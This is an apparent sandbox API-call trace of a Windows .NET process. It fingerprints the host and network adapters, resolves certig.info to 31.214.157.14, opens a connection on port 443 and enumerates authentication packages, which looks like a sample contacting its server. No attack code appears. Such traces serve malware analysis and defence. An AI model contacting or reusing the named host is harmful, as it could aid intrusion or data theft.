	[0118.113] VirtualQuery (in: lpAddress=0x2b20000, lpBuffer=0x1c7ed788, dwLength=0x30 | out: lpBuffer=0x1c7ed788*(BaseAddress=0x2b20000, AllocationBase=0x2b20000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0118.113] LocalFree (hMem=0x23b1c0) returned 0x0
	[0118.114] RegCloseKey (hKey=0x40c) returned 0x0
	[0118.181] GetVersionExW (in: lpVersionInformation=0x1c7ec760*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c7ec760*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0118.182] GetVersionExW (in: lpVersionInformation=0x1c7ec730*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c7ec730*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0118.184] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f921e8, cbSid=0x1c7ed770 | out: pSid=0x2f921e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed770) returned 1
	[0118.222] CreateMutexW (lpMutexAttributes=0x2f923f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.225] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.225] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f92708, cbSid=0x1c7ed6d0 | out: pSid=0x2f92708*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed6d0) returned 1
	[0118.226] CreateMutexW (lpMutexAttributes=0x2f928c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0118.227] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x414
	[0118.227] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0
	[0118.228] ReleaseMutex (hMutex=0x414) returned 1
	[0118.228] CloseHandle (hObject=0x414) returned 1
	[0118.229] GetCurrentProcessId () returned 0x7cc
	[0118.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x414
	[0118.231] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c7ed6e0, lpExitTime=0x1c7ed6d8, lpKernelTime=0x1c7ed6d0, lpUserTime=0x1c7ed6c8 | out: lpCreationTime=0x1c7ed6e0, lpExitTime=0x1c7ed6d8, lpKernelTime=0x1c7ed6d0, lpUserTime=0x1c7ed6c8) returned 1
	[0118.231] CloseHandle (hObject=0x414) returned 1
	[0118.250] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.255] CloseHandle (hObject=0x40c) returned 1
	[0118.292] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f93728, cbSid=0x1c7ed770 | out: pSid=0x2f93728*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed770) returned 1
	[0118.292] CreateMutexW (lpMutexAttributes=0x2f938e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.292] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x414
	[0118.293] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c7ed710, lpExitTime=0x1c7ed708, lpKernelTime=0x1c7ed700, lpUserTime=0x1c7ed6f8 | out: lpCreationTime=0x1c7ed710, lpExitTime=0x1c7ed708, lpKernelTime=0x1c7ed700, lpUserTime=0x1c7ed6f8) returned 1
	[0118.294] CloseHandle (hObject=0x414) returned 1
	[0118.294] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x414
	[0118.295] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.295] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.296] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x414, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ed668, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ed668*=0x418) returned 1
	[0118.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x414
	[0118.297] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c7ed710, lpExitTime=0x1c7ed708, lpKernelTime=0x1c7ed700, lpUserTime=0x1c7ed6f8 | out: lpCreationTime=0x1c7ed710, lpExitTime=0x1c7ed708, lpKernelTime=0x1c7ed700, lpUserTime=0x1c7ed6f8) returned 1
	[0118.297] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x414
	[0118.297] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.297] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.297] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x414, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ed668, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ed668*=0x418) returned 1
	[0118.298] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.298] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f94688, cbSid=0x1c7ed770 | out: pSid=0x2f94688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed770) returned 1
	[0118.298] CreateMutexW (lpMutexAttributes=0x2f94840, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.299] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.300] CloseHandle (hObject=0x40c) returned 1
	[0118.300] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f954c0, cbSid=0x1c7ed770 | out: pSid=0x2f954c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed770) returned 1
	[0118.300] CreateMutexW (lpMutexAttributes=0x2f95678, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.300] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.302] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.302] CloseHandle (hObject=0x40c) returned 1
	[0118.303] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f962f0, cbSid=0x1c7ed770 | out: pSid=0x2f962f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed770) returned 1
	[0118.303] CreateMutexW (lpMutexAttributes=0x2f964a8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.303] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.304] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.304] CloseHandle (hObject=0x40c) returned 1
	[0118.306] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f97120, cbSid=0x1c7ed720 | out: pSid=0x2f97120*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed720) returned 1
	[0118.306] CreateMutexW (lpMutexAttributes=0x2f972d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.306] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.307] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.307] CloseHandle (hObject=0x40c) returned 1
	[0118.307] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f97f40, cbSid=0x1c7ed720 | out: pSid=0x2f97f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed720) returned 1
	[0118.307] CreateMutexW (lpMutexAttributes=0x2f980f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.307] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.308] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.308] CloseHandle (hObject=0x40c) returned 1
	[0118.308] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f98d58, cbSid=0x1c7ed720 | out: pSid=0x2f98d58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed720) returned 1
	[0118.309] CreateMutexW (lpMutexAttributes=0x2f98f10, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.309] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.309] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.310] CloseHandle (hObject=0x40c) returned 1
	[0118.310] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f99b80, cbSid=0x1c7ed720 | out: pSid=0x2f99b80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed720) returned 1
	[0118.310] CreateMutexW (lpMutexAttributes=0x2f99d38, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.310] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.311] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.311] CloseHandle (hObject=0x40c) returned 1
	[0118.335] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f9a9a0, cbSid=0x1c7ed720 | out: pSid=0x2f9a9a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7ed720) returned 1
	[0118.336] CreateMutexW (lpMutexAttributes=0x2f9ab58, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.336] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.337] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.337] CloseHandle (hObject=0x40c) returned 1
	[0118.339] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x40c
	[0118.339] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x414
	[0118.340] ioctlsocket (in: s=0x40c, cmd=-2147195266, argp=0x1c7edd58 | out: argp=0x1c7edd58) returned 0
	[0118.502] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x418
	[0118.502] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0118.502] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x1c7edd58 | out: argp=0x1c7edd58) returned 0
	[0118.524] WSAIoctl (in: s=0x40c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7edcd0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7edcd0, lpOverlapped=0x0) returned -1
	[0118.526] CoTaskMemAlloc (cb=0x204) returned 0x1cff40
	[0118.526] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1cff40, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0118.590] CoTaskMemFree (pv=0x1cff40) 
	[0118.591] WSAEventSelect (s=0x40c, hEventObject=0x414, lNetworkEvents=512) returned 0
	[0118.591] WSAIoctl (in: s=0x418, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7edcd0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7edcd0, lpOverlapped=0x0) returned -1
	[0118.591] CoTaskMemAlloc (cb=0x204) returned 0x1cff40
	[0118.591] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1cff40, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0118.591] CoTaskMemFree (pv=0x1cff40) 
	[0118.591] WSAEventSelect (s=0x418, hEventObject=0x41c, lNetworkEvents=512) returned 0
	[0118.591] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x420
	[0118.592] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x420, param_3=0x3) returned 0x0
	[0118.597] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c7ede10 | out: phkResult=0x1c7ede10*=0x438) returned 0x0
	[0118.597] RegOpenKeyExW (in: hKey=0x438, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7edcf8 | out: phkResult=0x1c7edcf8*=0x43c) returned 0x0
	[0118.597] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x440
	[0118.598] RegNotifyChangeKeyValue (hKey=0x43c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x440, fAsynchronous=1) returned 0x0
	[0118.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7edd20 | out: phkResult=0x1c7edd20*=0x444) returned 0x0
	[0118.598] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448
	[0118.598] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0
	[0118.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7edd20 | out: phkResult=0x1c7edd20*=0x44c) returned 0x0
	[0118.598] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450
	[0118.598] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0
	[0118.599] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.599] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7edc88 | out: TokenHandle=0x1c7edc88*=0x454) returned 1
	[0118.605] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.605] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed458 | out: TokenHandle=0x1c7ed458*=0x458) returned 1
	[0118.610] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.610] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed458 | out: TokenHandle=0x1c7ed458*=0x45c) returned 1
	[0118.678] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c7edd58 | out: pProxyConfig=0x1c7edd58) returned 1
	[0118.898] SetEvent (hEvent=0x360) returned 1
	[0119.303] GetCurrentProcess () returned 0xffffffffffffffff
	[0119.303] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed4c8 | out: TokenHandle=0x1c7ed4c8*=0x4b4) returned 1
	[0119.304] GetCurrentProcess () returned 0xffffffffffffffff
	[0119.304] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed4c8 | out: TokenHandle=0x1c7ed4c8*=0x4b8) returned 1
	[0119.350] SetEvent (hEvent=0x360) returned 1
	[0119.410] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c7ed998 | out: pFixedInfo=0x0, pOutBufLen=0x1c7ed998) returned 0x6f
	[0119.505] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b8a2870
	[0119.505] GetNetworkParams (in: pFixedInfo=0x1b8a2870, pOutBufLen=0x1c7ed998 | out: pFixedInfo=0x1b8a2870, pOutBufLen=0x1c7ed998) returned 0x0
	[0119.644] CoTaskMemAlloc (cb=0xd) returned 0x1b8894c0
	[0119.644] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0119.644] CoTaskMemFree (pv=0x1b8894c0) 
	[0119.646] LocalFree (hMem=0x1b8a2870) returned 0x0
	[0119.683] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc
	[0119.758] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0119.761] CoTaskMemAlloc (cb=0xd) returned 0x1b8894c0
	[0119.762] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c7ed940*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c7ed938 | out: ppResult=0x1c7ed938*=0x1b860380*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b889600*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0120.340] CoTaskMemFree (pv=0x1b8894c0) 
	[0120.340] CoTaskMemFree (pv=0x0) 
	[0120.342] FreeAddrInfoW (pAddrInfo=0x1b860380*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b889600*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0120.343] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc
	[0120.343] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d4
	[0120.343] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x1c7ed958 | out: argp=0x1c7ed958) returned 0
	[0120.343] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0120.343] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8
	[0120.343] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x1c7ed958 | out: argp=0x1c7ed958) returned 0
	[0120.343] WSAIoctl (in: s=0x4dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7ed8d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7ed8d0, lpOverlapped=0x0) returned -1
	[0120.344] CoTaskMemAlloc (cb=0x204) returned 0x1d0570
	[0120.344] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1d0570, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0120.344] CoTaskMemFree (pv=0x1d0570) 
	[0120.344] WSAEventSelect (s=0x4dc, hEventObject=0x4d4, lNetworkEvents=512) returned 0
	[0120.344] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7ed8d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7ed8d0, lpOverlapped=0x0) returned -1
	[0120.344] CoTaskMemAlloc (cb=0x204) returned 0x1d0570
	[0120.344] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1d0570, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0120.344] CoTaskMemFree (pv=0x1d0570) 
	[0120.344] WSAEventSelect (s=0x4e4, hEventObject=0x4e8, lNetworkEvents=512) returned 0
	[0120.462] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x1c7ed428*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x1c7ed428*=0xbf0) returned 0x6f
	[0120.477] LocalAlloc (uFlags=0x0, uBytes=0xbf0) returned 0x1b89c5b0
	[0120.477] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x1b89c5b0, SizePointer=0x1c7ed428*=0xbf0 | out: AdapterAddresses=0x1b89c5b0*(Alignment=0xe000001c0, Length=0x1c0, IfIndex=0xe, Next=0x1b89c8e0, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x1b89c830, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x1b89c770*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x1c7ed428*=0xbf0) returned 0x0
	[0120.513] LocalFree (hMem=0x1b89c5b0) returned 0x0
	[0120.516] WSAConnect (in: s=0x4cc, name=0x2fa63e8*(sa_family=2, sin_port=0x1bb, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0120.553] closesocket (s=0x4c8) returned 0
	[0121.199] EnumerateSecurityPackagesW (in: pcPackages=0x1c7ed7b8, ppPackageInfo=0x1c7ed7b0 | out: pcPackages=0x1c7ed7b8, ppPackageInfo=0x1c7ed7b0) returned 0x0
	[0121.227] lstrlenW (lpString="Negotiate") returned 9
	[0121.227] CoTaskMemAlloc (cb=0x16) returned 0x1b889560
	[0121.227] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a8ff0, Length=0x14 | out: Destination=0x1b889560) 
	[0121.227] CoTaskMemFree (pv=0x1b889560) 
	[0121.227] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0121.228] CoTaskMemAlloc (cb=0x3c) returned 0x1b893230
	[0121.228] RtlMoveMemory (in: Destination=0x1b893230, Source=0x1a9004, Length=0x3a | out: Destination=0x1b893230) 
	[0121.228] CoTaskMemFree (pv=0x1b893230) 
	[0121.228] lstrlenW (lpString="NegoExtender") returned 12
	[0121.228] CoTaskMemAlloc (cb=0x1c) returned 0x1b8a33f0
	[0121.228] RtlMoveMemory (in: Destination=0x1b8a33f0, Source=0x1a903e, Length=0x1a | out: Destination=0x1b8a33f0) 
	[0121.228] CoTaskMemFree (pv=0x1b8a33f0) 
	[0121.228] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0121.228] CoTaskMemAlloc (cb=0x3e) returned 0x1b893230
	[0121.228] RtlMoveMemory (in: Destination=0x1b893230, Source=0x1a9058, Length=0x3c | out: Destination=0x1b893230) 
	[0121.228] CoTaskMemFree (pv=0x1b893230) 
	[0121.228] lstrlenW (lpString="Kerberos") returned 8
	[0121.228] CoTaskMemAlloc (cb=0x14) returned 0x1b889560
	[0121.228] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a9094, Length=0x12 | out: Destination=0x1b889560) 
